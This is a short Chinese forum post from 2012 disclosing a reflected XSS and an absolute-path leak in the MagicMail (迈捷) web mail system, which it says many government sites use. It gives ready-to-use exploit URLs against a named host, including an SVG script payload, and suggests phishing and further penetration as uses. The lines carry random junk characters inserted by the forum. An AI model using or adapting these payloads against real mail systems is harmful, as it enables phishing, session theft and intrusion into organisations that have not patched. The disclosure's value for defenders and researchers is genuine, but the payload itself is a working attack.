今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞. ]& {' j- ^0 L8 o# J- M: R
7 L9 N! r( y- s7 S F* `+ C
$ j3 h0 }0 Z- h. q" w: U. O; S" }包含 一个反射性XSS 以及 绝对路径泄漏+ F& w$ `! {6 p) [2 Z9 K/ r x6 T
看了看 貌似全部是linux的。
% i9 a( \, \4 ]# w
2 N3 g" p% m }6 Z) C, x; @7 j关键字:迈捷邮件系统 by MagicMail7 _# M( B4 \# ?* b6 _0 l0 q4 w3 x9 n
) d" e; G7 `5 M可以看到很多政府网站都用这个邮件系统2 y. M4 U$ p6 C
4 T1 k# _2 ~ ^1 N& f6 A
绝对路径 http://madman.in/index.php?login_type=declare&language=$ B- X, e' ]' Y/ q/ @
5 r7 u! H1 Z: `
R+ h' o# _" l; `5 t0 @5 N) X' [, d7 l* l6 e
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
( G c5 j( T) }& H( W' `( }3 ^8 C: b- B6 l G
' }' Q- H/ R: g& @$ p. ?
6 ^. [0 U3 x5 z# W# Y
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
6 l8 A/ I2 W# U8 P 6 j6 C& Y4 S2 _0 W$ R2 q& d* G2 R
修复方案:看官方补丁吧。0 ~+ \8 X1 U. m8 D/ Q
|
发表于 2012-11-9 20:38:41
收藏
支持
反对